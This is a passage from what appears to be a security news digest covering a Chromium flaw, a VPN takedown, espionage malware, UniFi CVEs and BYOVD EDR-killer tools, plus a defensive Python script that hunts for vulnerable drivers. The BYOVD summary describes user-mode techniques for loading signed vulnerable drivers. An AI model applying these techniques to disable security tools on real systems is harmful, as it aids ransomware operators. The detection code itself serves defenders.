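With the default simulation the key is last accepted 1320 s after deletion and the loop declares it revoked at 1410 s, i.e. the slowest edge, not the median, sets the exposure window; recording `last_accepted_at` per rotation is what turns the vendor's numbers into your own evidence.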

Unpatched Chromium Service Worker persistence flaw exposed in tracker

Updated: · First: 21.05.2026 21:13 · 📰 1 src / 1 articles

A persistence flaw in the Service Worker implementation of Chromium-based browsers allowed a site's JavaScript to keep executing in the background after the browser was closed, which the report describes as enabling remote code execution (RCE) on the device. The issue was reported in December 2022 and, although marked as fixed in February 2026, remained unpatched. Google also left the technical details publicly visible in the Chromium Issue Tracker for 14 weeks, increasing the risk of exploitation. Affected browsers include Chrome, Edge, Brave, Opera, Vivaldi, and Arc.

Shifting enterprise budget allocations for identity security in AI agent deployments

Updated: · First: 21.05.2026 18:43 · 📰 1 src / 1 articles

A 2025–2026 Omdia study indicates identity teams are establishing dedicated budgets for securing AI agents, reflecting a significant shift from traditional IAM funding models controlled by CIO or CISO offices. As AI agents proliferate and operate autonomously across hybrid environments, securing their identities—authentication, authorization, governance, and life cycle management—has become a first-class requirement. Enterprises are allocating standalone AI budgets to fund these identity security layers, creating a new funding stream distinct from IT or security budgets.

Seizure of First VPN service operations amid widespread abuse in cybercrime investigations

Updated: 21.05.2026 18:30 · First: 21.05.2026 16:09 · 📰 2 src / 2 articles

An international law enforcement operation dismantled the 'First VPN' service, widely abused in ransomware and data theft campaigns, after a multi-year investigation. Operations included the seizure of 33 servers across 27 countries, the arrest of a Ukrainian administrator, and the takeover of associated domains (1vpns.com, 1vpns.net, 1vpns.org, and onion variants). The platform was marketed as no-logging and privacy-focused but allegedly used by threat actors to conceal infrastructure and identities. Investigators infiltrated the service, collected traffic data, and identified thousands of users globally, sharing 506 user identities and 83 intelligence packages with international partners to support ongoing cybercrime investigations. Europol coordinated the operation with support from Bitdefender, advancing 21 investigations through the intelligence gathered.

Espionage Campaign Targeting Eastern Asia via Sogou Zhuyin Update Server Hijacking

Updated: 21.05.2026 17:17 · First: 29.08.2025 16:12 · 📰 3 src / 3 articles

The TAOTH espionage campaign continues to target East Asia through hijacked Sogou Zhuyin update servers, delivering the C6DOOR, GTELAM, DESFY, and TOSHIS malware families to dissidents, journalists, and business leaders. The campaign, whose infrastructure overlaps with that of the ITOCHU threat actor, mainly affects Taiwan (49% of targets), Cambodia, and the U.S.; phishing websites and fake cloud storage pages serve as additional distribution channels. Separately, Chinese state-aligned hackers have expanded their use of Showboat, a Linux post-exploitation framework now confirmed to operate as a SOCKS5 proxy backdoor with rootkit-like capabilities. Showboat has been deployed against telecommunications providers in the Middle East since at least mid-2022, with confirmed victims in Afghanistan and Azerbaijan and possible compromises in the U.S. and Ukraine. Its modular design provides remote shell access, file transfer, and infection of other devices on the LAN, and it often uses infrastructure geolocated to Chengdu, Sichuan. The malware fetches obfuscation code from a Pastebin snippet created in January 2022, pointing to long-term development and reuse across Chinese APT groups, including Calypso, which also deploys the JFMBackdoor Windows backdoor.

Mass exploitation of signed vulnerable drivers by 54 EDR killer tools via BYOVD technique

Updated: 22.05.2026 14:38 · First: 19.03.2026 20:52 · 📰 2 src / 1 articles

Security vendors have identified 54 distinct EDR killer tools that abuse the Bring Your Own Vulnerable Driver (BYOVD) technique, exploiting 34 vulnerable but validly signed drivers to disable endpoint detection and response (EDR) products. The tools are used mainly by ransomware groups, their affiliates, and underground service providers to neutralize security controls before the file-encrypting payload runs. Once a vulnerable driver is loaded, the attacker has kernel-mode (Ring 0) access and can terminate EDR processes, disable protection mechanisms, and tamper with kernel callbacks, undermining endpoint defenses by abusing Microsoft's driver trust model. Recent research shows that the loading step can be done entirely from user mode, which widens the set of drivers that can be abused. Using SetupAPI or the Software Device API, an attacker can create a software-emulated device node with an arbitrary hardware ID, which triggers the driver's AddDevice callback and assembles a device stack without any physical hardware present. Registry manipulation can then bind a driver to arbitrary hardware IDs without a signed INF or catalog package; the driver binary itself still has to pass signature enforcement, which is why signed-but-vulnerable drivers remain the currency of these attacks. Filter drivers whose vulnerable code is only reachable once they sit on a working device stack can be attached atop one (for example the Disk Drive class) so that IRP_MJ_CREATE succeeds and the handler becomes reachable, turning previously conditional bugs into practical targets. Taken together, these techniques suggest the pool of exploitable drivers will keep growing as attackers refine userland-only deployment, even as Microsoft tightens cross-signing policies.
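Because the abused driver is validly signed, signature checks alone will not catch it; the hunt has to key on what is loaded and from where. The following is an added example, not code from the research the article summarizes. Its input is a list of driver records (service name, image path, SHA-256, Authenticode signer CN) of the kind you can build on a host from `driverquery /v /fo csv` plus `Get-FileHash` and `Get-AuthenticodeSignature` on each image, or from an EDR inventory export. The blocklist is a set of SHA-256 hashes you supply, for example exported from Microsoft's recommended driver block rules or the loldrivers.io feed; the hashes, driver names and paths below are constructed placeholders and are not the hashes of any real driver. Three signals are combined: a blocklist hash match, a kernel image loaded from a user-writable location (where an EDR killer typically drops its driver), and an unsigned image.

```python
"""Hunt a driver inventory for BYOVD candidates.

Added example, not from the research the article summarizes. The records and
blocklist hashes are constructed placeholders, not real driver hashes.
"""
import hashlib
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple


@dataclass(frozen=True)
class DriverRecord:
    name: str      # service name (e.g. from driverquery)
    path: str      # ImagePath as reported, in any of Windows' usual spellings
    sha256: str
    signer: str    # subject CN of the Authenticode signer; '' if unsigned


USER_WRITABLE_PREFIXES = (
    "c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\",
)


def normalize_image_path(path: str) -> str:
    """Collapse the registry/driverquery spellings of a driver path into one
    lower-case absolute form so prefix checks behave: \\??\\C:\\..., \\SystemRoot\\...
    and the bare system32\\drivers\\x.sys relative form all occur in practice.
    Assumes the system drive is C:."""
    p = path.strip().lower().replace("/", "\\")
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.startswith("\\systemroot\\"):
        p = "c:\\windows\\" + p[len("\\systemroot\\"):]
    elif p.startswith("system32\\"):
        p = "c:\\windows\\" + p
    return p


def load_blocklist(text: str) -> Set[str]:
    """Parse a one-hash-per-line list; '#' starts a comment."""
    hashes = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip().lower()
        if len(line) == 64:
            hashes.add(line)
    return hashes


def sha256_of_file(path: str) -> str:
    """For real runs: hash a driver image on disk in 1 MiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def assess(rec: DriverRecord, blocklist: Set[str]) -> List[str]:
    """Return the reasons a driver record deserves attention (empty if none)."""
    reasons = []
    if rec.sha256.lower() in blocklist:
        reasons.append("hash_in_vulnerable_driver_blocklist")
    if normalize_image_path(rec.path).startswith(USER_WRITABLE_PREFIXES):
        reasons.append("image_in_user_writable_path")
    if not rec.signer:
        reasons.append("unsigned")
    return reasons


def hunt(records: Iterable[DriverRecord], blocklist: Set[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (severity, name, reasons) for every flagged driver, high severity first.
    A blocklist hit is high: that driver is the BYOVD payload itself."""
    findings = []
    for rec in records:
        reasons = assess(rec, blocklist)
        if reasons:
            sev = "high" if "hash_in_vulnerable_driver_blocklist" in reasons else "medium"
            findings.append((sev, rec.name, reasons))
    findings.sort(key=lambda f: (f[0] != "high", f[1]))
    return findings


# Constructed blocklist: placeholder hashes, not those of any real driver.
BLOCKLIST_TEXT = f"""\
# sha256 of known-vulnerable signed drivers (constructed placeholders)
{'a1' * 32}
{'b2' * 32}  # trailing comment
"""
BLOCKLIST = load_blocklist(BLOCKLIST_TEXT)

# Constructed inventory in the spellings driverquery / the registry actually produce.
SAMPLE_INVENTORY = [
    DriverRecord("disk", "\\SystemRoot\\System32\\drivers\\disk.sys", "11" * 32, "Microsoft Windows"),
    DriverRecord("vendorfilter", "system32\\drivers\\vendorfilter.sys", "44" * 32, "Example Hardware Co."),
    DriverRecord("gputool", "\\??\\C:\\ProgramData\\Update\\gputool.sys", "a1" * 32, "Example Hardware Co."),
    DriverRecord("nethelper", "C:\\Users\\Public\\nethelper.sys", "33" * 32, ""),
]


if __name__ == "__main__":
    for severity, name, reasons in hunt(SAMPLE_INVENTORY, BLOCKLIST):
        print(f"[{severity}] {name}: {', '.join(reasons)}")
```

The signed third-party driver in `system32\drivers` is deliberately not flagged: a vendor signature outside Microsoft's is normal, and it is the hash match, not the signer, that separates a vulnerable driver from a legitimate one. Keep the blocklist current; the research above implies the set of usable drivers grows as loading tricks improve.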

Critical Path Traversal in Ubiquiti UniFi Network Application Enables Account Takeover

Updated: 22.05.2026 15:00 · First: 19.03.2026 15:00 · 📰 2 src / 1 articles

CVE-2026-22557, a critical path traversal vulnerability in Ubiquiti's UniFi Network Application (versions 10.1.85 and earlier), lets an unauthenticated attacker with network access to the application read system files and take over accounts, with no privileges or user interaction required. It affects UniFi Network Application deployments generally, including those run on UniFi Cloud Gateways and managing switches, access points, and gateways. Ubiquiti fixed it in version 10.1.89, along with a second, authenticated NoSQL injection flaw that enabled privilege escalation. Ubiquiti has since patched three further maximum-severity UniFi OS vulnerabilities (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910) that allow unauthorized system changes, file access, and command injection once network access is obtained, plus two additional flaws (CVE-2026-33000 and CVE-2026-34911). Threat intelligence firm Censys estimates nearly 100,000 Internet-exposed UniFi OS endpoints worldwide, about 50,000 of them in the United States. All of the flaws were reported through Ubiquiti's HackerOne bug bounty program and are exploitable in low-complexity attacks; Ubiquiti has not disclosed evidence of in-the-wild exploitation for any of them, but Ubiquiti products have previously been targeted by state-backed actors and cybercriminals for botnet construction and traffic concealment, which argues for keeping these management interfaces off the Internet.